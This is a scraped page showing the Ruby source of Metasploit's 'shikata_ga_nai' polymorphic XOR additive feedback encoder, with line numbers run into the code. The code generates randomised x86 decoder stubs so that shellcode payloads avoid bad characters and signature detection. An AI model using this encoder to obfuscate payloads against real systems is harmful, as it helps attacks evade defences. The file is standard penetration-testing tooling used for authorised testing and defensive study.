Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/encoders/x86/shikata_ga_nai.rb
Views: 11780
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'rex/poly'67class MetasploitModule < Msf::Encoder::XorAdditiveFeedback89# The shikata encoder has an excellent ranking because it is polymorphic.10# Party time, excellent!11Rank = ExcellentRanking1213def initialize14super(15'Name' => 'Polymorphic XOR Additive Feedback Encoder',16'Description' => %q{17This encoder implements a polymorphic XOR additive feedback encoder.18The decoder stub is generated based on dynamic instruction19substitution and dynamic block ordering. Registers are also20selected dynamically.21},22'Author' => 'spoonm',23'Arch' => ARCH_X86,24'License' => MSF_LICENSE,25'Decoder' =>26{27'KeySize' => 4,28'BlockSize' => 429})30end3132#33# Generates the shikata decoder stub.34#35def decoder_stub(state)3637# If the decoder stub has not already been generated for this state, do38# it now. The decoder stub method may be called more than once.39if (state.decoder_stub == nil)4041# Sanity check that saved_registers doesn't overlap with modified_registers42if (modified_registers & saved_registers).length > 043raise BadGenerateError44end4546# Shikata will only cut off the last 1-4 bytes of it's own end47# depending on the alignment of the original buffer48cutoff = 4 - (state.buf.length & 3)49block = generate_shikata_block(state, state.buf.length + cutoff, cutoff) || (raise BadGenerateError)5051# Set the state specific key offset to wherever the XORK ended up.52state.decoder_key_offset = block.index('XORK')5354# Take the last 1-4 bytes of shikata and prepend them to the buffer55# that is going to be encoded to make it align on a 4-byte boundary.56state.buf = block.slice!(block.length - cutoff, cutoff) + state.buf5758# Cache this decoder stub. The reason we cache the decoder stub is59# because we need to ensure that the same stub is returned every time60# for a given encoder state.61state.decoder_stub = block62end6364state.decoder_stub65end6667# Indicate that this module can preserve some registers68def can_preserve_registers?69true70end7172# A list of registers always touched by this encoder73def modified_registers74# ESP is assumed and is handled through preserves_stack?75[76# The counter register is hardcoded77Rex::Arch::X86::ECX,78# These are modified by div and mul operations79Rex::Arch::X86::EAX, Rex::Arch::X86::EDX80]81end8283# Always blacklist these registers in our block generation84def block_generator_register_blacklist85[Rex::Arch::X86::ESP, Rex::Arch::X86::ECX] | saved_registers86end8788protected8990#91# Returns the set of FPU instructions that can be used for the FPU block of92# the decoder stub.93#94def fpu_instructions95fpus = []96970xe8.upto(0xee) { |x| fpus << "\xd9" + x.chr }980xc0.upto(0xcf) { |x| fpus << "\xd9" + x.chr }990xc0.upto(0xdf) { |x| fpus << "\xda" + x.chr }1000xc0.upto(0xdf) { |x| fpus << "\xdb" + x.chr }1010xc0.upto(0xc7) { |x| fpus << "\xdd" + x.chr }102103fpus << "\xd9\xd0"104fpus << "\xd9\xe1"105fpus << "\xd9\xf6"106fpus << "\xd9\xf7"107fpus << "\xd9\xe5"108109# This FPU instruction seems to fail consistently on Linux110#fpus << "\xdb\xe1"111112fpus113end114115#116# Returns a polymorphic decoder stub that is capable of decoding a buffer117# of the supplied length and encodes the last cutoff bytes of itself.118#119def generate_shikata_block(state, length, cutoff)120# Declare logical registers121count_reg = Rex::Poly::LogicalRegister::X86.new('count', 'ecx')122addr_reg = Rex::Poly::LogicalRegister::X86.new('addr')123key_reg = nil124125if state.context_encoding126key_reg = Rex::Poly::LogicalRegister::X86.new('key', 'eax')127else128key_reg = Rex::Poly::LogicalRegister::X86.new('key')129end130131# Declare individual blocks132endb = Rex::Poly::SymbolicBlock::End.new133134# Clear the counter register135clear_register = Rex::Poly::LogicalBlock.new('clear_register',136"\x31\xc9", # xor ecx,ecx137"\x29\xc9", # sub ecx,ecx138"\x33\xc9", # xor ecx,ecx139"\x2b\xc9") # sub ecx,ecx140141# Initialize the counter after zeroing it142init_counter = Rex::Poly::LogicalBlock.new('init_counter')143144# Divide the length by four but ensure that it aligns on a block size145# boundary (4 byte).146length += 4 + (4 - (length & 3)) & 3147length /= 4148149if (length <= 255)150init_counter.add_perm("\xb1" + [ length ].pack('C'))151elsif (length <= 65536)152init_counter.add_perm("\x66\xb9" + [ length ].pack('v'))153else154init_counter.add_perm("\xb9" + [ length ].pack('V'))155end156157# Key initialization block158init_key = nil159160# If using context encoding, we use a mov reg, [addr]161if state.context_encoding162init_key = Rex::Poly::LogicalBlock.new('init_key',163Proc.new { |b| (0xa1 + b.regnum_of(key_reg)).chr + 'XORK'})164# Otherwise, we do a direct mov reg, val165else166init_key = Rex::Poly::LogicalBlock.new('init_key',167Proc.new { |b| (0xb8 + b.regnum_of(key_reg)).chr + 'XORK'})168end169170xor = Proc.new { |b| "\x31" + (0x40 + b.regnum_of(addr_reg) + (8 * b.regnum_of(key_reg))).chr }171add = Proc.new { |b| "\x03" + (0x40 + b.regnum_of(addr_reg) + (8 * b.regnum_of(key_reg))).chr }172173sub4 = Proc.new { |b| sub_immediate(b.regnum_of(addr_reg), -4) }174add4 = Proc.new { |b| add_immediate(b.regnum_of(addr_reg), 4) }175176if (datastore["BufferRegister"])177178buff_reg = Rex::Poly::LogicalRegister::X86.new('buff', datastore["BufferRegister"])179offset = (datastore["BufferOffset"] ? datastore["BufferOffset"].to_i : 0)180if ((offset < -255 or offset > 255) and state.badchars.include? "\x00")181raise EncodingError.new("Can't generate NULL-free decoder with a BufferOffset bigger than one byte")182end183mov = Proc.new { |b|184# mov <buff_reg>, <addr_reg>185"\x89" + (0xc0 + b.regnum_of(addr_reg) + (8 * b.regnum_of(buff_reg))).chr186}187add_offset = Proc.new { |b| add_immediate(b.regnum_of(addr_reg), offset) }188sub_offset = Proc.new { |b| sub_immediate(b.regnum_of(addr_reg), -offset) }189190getpc = Rex::Poly::LogicalBlock.new('getpc')191getpc.add_perm(Proc.new{ |b| mov.call(b) + add_offset.call(b) })192getpc.add_perm(Proc.new{ |b| mov.call(b) + sub_offset.call(b) })193194# With an offset of less than four, inc is smaller than or the same size as add195if (offset > 0 and offset < 4)196getpc.add_perm(Proc.new{ |b| mov.call(b) + inc(b.regnum_of(addr_reg))*offset })197elsif (offset < 0 and offset > -4)198getpc.add_perm(Proc.new{ |b| mov.call(b) + dec(b.regnum_of(addr_reg))*(-offset) })199end200201# NOTE: Adding a perm with possibly different sizes is normally202# wrong since it will change the SymbolicBlock::End offset during203# various stages of generation. In this case, though, offset is204# constant throughout the whole process, so it isn't a problem.205getpc.add_perm(Proc.new{ |b|206if (offset < -255 or offset > 255)207# lea addr_reg, [buff_reg + DWORD offset]208# NOTE: This will generate NULL bytes!209"\x8d" + (0x80 + b.regnum_of(buff_reg) + (8 * b.regnum_of(addr_reg))).chr + [offset].pack('V')210elsif (offset > -255 and offset != 0 and offset < 255)211# lea addr_reg, [buff_reg + byte offset]212"\x8d" + (0x40 + b.regnum_of(buff_reg) + (8 * b.regnum_of(addr_reg))).chr + [offset].pack('c')213else214# lea addr_reg, [buff_reg]215"\x8d" + (b.regnum_of(buff_reg) + (8 * b.regnum_of(addr_reg))).chr216end217})218219# BufferReg+BufferOffset points right at the beginning of our220# buffer, so in contrast to the fnstenv technique, we don't have to221# sub off any other offsets.222xor1 = Proc.new { |b| xor.call(b) + [ (b.offset_of(endb) - cutoff) ].pack('c') }223xor2 = Proc.new { |b| xor.call(b) + [ (b.offset_of(endb) - 4 - cutoff) ].pack('c') }224add1 = Proc.new { |b| add.call(b) + [ (b.offset_of(endb) - cutoff) ].pack('c') }225add2 = Proc.new { |b| add.call(b) + [ (b.offset_of(endb) - 4 - cutoff) ].pack('c') }226227else228# FPU blocks229fpu = Rex::Poly::LogicalBlock.new('fpu',230*fpu_instructions)231232fnstenv = Rex::Poly::LogicalBlock.new('fnstenv',233"\xd9\x74\x24\xf4")234fnstenv.depends_on(fpu)235236# Get EIP off the stack237getpc = Rex::Poly::LogicalBlock.new('getpc',238Proc.new { |b| (0x58 + b.regnum_of(addr_reg)).chr })239getpc.depends_on(fnstenv)240241# Subtract the offset of the fpu instruction since that's where eip points after fnstenv242xor1 = Proc.new { |b| xor.call(b) + [ (b.offset_of(endb) - b.offset_of(fpu) - cutoff) ].pack('c') }243xor2 = Proc.new { |b| xor.call(b) + [ (b.offset_of(endb) - b.offset_of(fpu) - 4 - cutoff) ].pack('c') }244add1 = Proc.new { |b| add.call(b) + [ (b.offset_of(endb) - b.offset_of(fpu) - cutoff) ].pack('c') }245add2 = Proc.new { |b| add.call(b) + [ (b.offset_of(endb) - b.offset_of(fpu) - 4 - cutoff) ].pack('c') }246end247248# Decoder loop block249loop_block = Rex::Poly::LogicalBlock.new('loop_block')250251loop_block.add_perm(252Proc.new { |b| xor1.call(b) + add1.call(b) + sub4.call(b) },253Proc.new { |b| xor1.call(b) + sub4.call(b) + add2.call(b) },254Proc.new { |b| sub4.call(b) + xor2.call(b) + add2.call(b) },255Proc.new { |b| xor1.call(b) + add1.call(b) + add4.call(b) },256Proc.new { |b| xor1.call(b) + add4.call(b) + add2.call(b) },257Proc.new { |b| add4.call(b) + xor2.call(b) + add2.call(b) })258259# Loop instruction block260loop_inst = Rex::Poly::LogicalBlock.new('loop_inst',261"\xe2\xf5")262# In the current implementation the loop block is a constant size,263# so really no need for a fancy calculation. Nevertheless, here's264# one way to do it:265#Proc.new { |b|266# # loop <loop_block label>267# # -2 to account for the size of this instruction268# "\xe2" + [ -2 - b.size_of(loop_block) ].pack('c')269#})270271# Define block dependencies272clear_register.depends_on(getpc)273init_counter.depends_on(clear_register)274loop_block.depends_on(init_counter, init_key)275loop_inst.depends_on(loop_block)276277begin278# Generate a permutation saving the ECX, ESP, and user defined registers279loop_inst.generate(block_generator_register_blacklist, nil, state.badchars)280rescue RuntimeError, EncodingError => e281# The Rex::Poly block generator can raise RuntimeError variants282raise EncodingError, e.to_s283end284end285286# Convert the SaveRegisters to an array of x86 register constants287def saved_registers288Rex::Arch::X86.register_names_to_ids(datastore['SaveRegisters'])289end290291def sub_immediate(regnum, imm)292return "" if imm.nil? or imm == 0293if imm > 255 or imm < -255294"\x81" + (0xe8 + regnum).chr + [imm].pack('V')295else296"\x83" + (0xe8 + regnum).chr + [imm].pack('c')297end298end299def add_immediate(regnum, imm)300return "" if imm.nil? or imm == 0301if imm > 255 or imm < -255302"\x81" + (0xc0 + regnum).chr + [imm].pack('V')303else304"\x83" + (0xc0 + regnum).chr + [imm].pack('c')305end306end307def inc(regnum)308[0x40 + regnum].pack('C')309end310def dec(regnum)311[0x48 + regnum].pack('C')312end313end314315316